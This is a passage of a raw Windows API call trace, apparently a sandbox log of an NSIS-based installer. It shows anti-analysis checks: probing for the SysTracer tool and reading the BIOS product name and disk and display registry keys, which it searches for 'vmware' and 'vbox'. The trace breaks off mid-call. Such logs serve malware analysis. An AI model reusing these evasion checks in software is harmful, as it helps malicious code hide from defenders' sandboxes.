lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.922] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.922] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.922] lstrcpynA (in: lpString1=0x31482c, lpString2="kernel32::IsWow64Process(ps,*i0s)", iMaxLength=1024 | out: lpString1="kernel32::IsWow64Process(ps,*i0s)") returned="kernel32::IsWow64Process(ps,*i0s)" [0157.923] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.923] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.923] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.923] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.923] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.923] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.923] lstrcpyA (in: lpString1=0x321ba8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.923] 
lstrcpyA (in: lpString1=0x321fb8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.923] lstrcpyA (in: lpString1=0x3223b8, lpString2="IsWow64Process" | out: lpString1="IsWow64Process") returned="IsWow64Process" [0157.923] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.923] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0157.924] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.924] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2f17c0 | out: Wow64Process=0x2f17c0) returned 1 [0157.924] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="1") returned 1 [0157.924] lstrcpynA (in: lpString1=0x31441c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="-1") returned 2 [0157.924] lstrcpynA (in: lpString1=0x438000, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrlenA (lpString="1") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcmpiA (lpString1="1", lpString2="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer", iMaxLength=1024 | out: lpString1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer") returned="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer" [0157.924] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x0) 
returned 0x2 [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="DisplayName", iMaxLength=1024 | out: lpString1="DisplayName") returned="DisplayName" [0157.924] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrlenA (lpString="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrlenA (lpString="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="HARDWARE\\DESCRIPTION\\System\\BIOS", iMaxLength=1024 | out: lpString1="HARDWARE\\DESCRIPTION\\System\\BIOS") returned="HARDWARE\\DESCRIPTION\\System\\BIOS" [0157.924] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\BIOS", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="SystemProductName", iMaxLength=1024 | out: lpString1="SystemProductName") returned="SystemProductName" [0157.925] RegQueryValueExA (in: hKey=0x1c, lpValueName="SystemProductName", lpReserved=0x0, lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x1, lpData="\"SATELLITE L870-18Z\"", lpcbData=0x18f98c*=0x15) returned 0x0 [0157.925] RegCloseKey (hKey=0x1c) returned 0x0 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.925] lstrlenA (lpString="\"SATELLITE L870-18Z\"") returned 20 [0157.925] 
lstrcpynA (in: lpString1=0x40ac18, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.925] lstrcmpiA (lpString1="\"SATELLITE L870-18Z\"", lpString2="0") returned -1 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.925] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.925] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.925] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.926] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.926] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.926] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.926] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.926] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.926] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.926] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.926] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.927] GetProcAddress (hModule=0x75710000, 
lpProcName="Call") returned 0x757116df [0157.927] lstrcpyA (in: lpString1=0x3217a0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.927] lstrcpyA (in: lpString1=0x321bb0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.927] lstrcpyA (in: lpString1=0x321fb0, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0157.927] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.927] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.927] lstrlenA (lpString="CharLower") returned 9 [0157.927] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.927] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.928] lstrcpynA (in: lpString1=0x314418, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.928] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.928] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.928] lstrcpyA (in: lpString1=0x432c00, lpString2="\"satellite l870-18z\"" | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.928] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="3228696") returned 7 [0157.928] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.928] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.928] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.928] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.928] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.929] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff 
[0157.929] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vmware')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vmware')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vmware')i.R0 ?c" [0157.929] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.929] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.929] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.930] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.930] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.930] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.930] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.930] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.930] lstrcpynA (in: lpString1=0x323058, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.930] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.931] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.931] lstrlenA (lpString="strstr") returned 6 [0157.931] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.931] 
lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] lstrcpynA (in: lpString1=0x314418, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.931] strstr (_Str="\"satellite l870-18z\"", _SubStr="vmware") returned 0x0 [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.931] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.931] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.931] lstrlenA (lpString="0") returned 1 [0157.931] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrcpynA (in: lpString1=0x40b018, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0157.932] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.932] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.932] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.932] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vbox')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vbox')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vbox')i.R0 ?c" [0157.932] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.932] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.933] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.933] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.933] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.933] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.933] lstrcpynA (in: lpString1=0x323058, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.933] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.933] lstrlenA (lpString="strstr") returned 6 [0157.933] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.933] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] lstrcpynA (in: lpString1=0x314418, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: 
lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] lstrcpynA (in: lpString1=0x3217a0, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.933] strstr (_Str="\"satellite l870-18z\"", _SubStr="vbox") returned 0x0 [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.934] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", iMaxLength=1024 | out: lpString1="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000") returned="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000" [0157.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="Device Description", iMaxLength=1024 | out: lpString1="Device Description") returned="Device Description" [0157.934] RegQueryValueExA (in: hKey=0x1c, lpValueName="Device Description", lpReserved=0x0, lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x0, lpData=0x432c00*=0x0, 
lpcbData=0x18f98c*=0x400) returned 0x2 [0157.934] RegCloseKey (hKey=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="SYSTEM\\ControlSet001\\services\\Disk\\Enum", iMaxLength=1024 | out: lpString1="SYSTEM\\ControlSet001\\services\\Disk\\Enum") returned="SYSTEM\\ControlSet001\\services\\Disk\\Enum" [0157.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] RegQueryValueExA (in: hKey=0x1c, lpValueName="0", lpReserved=0x0, 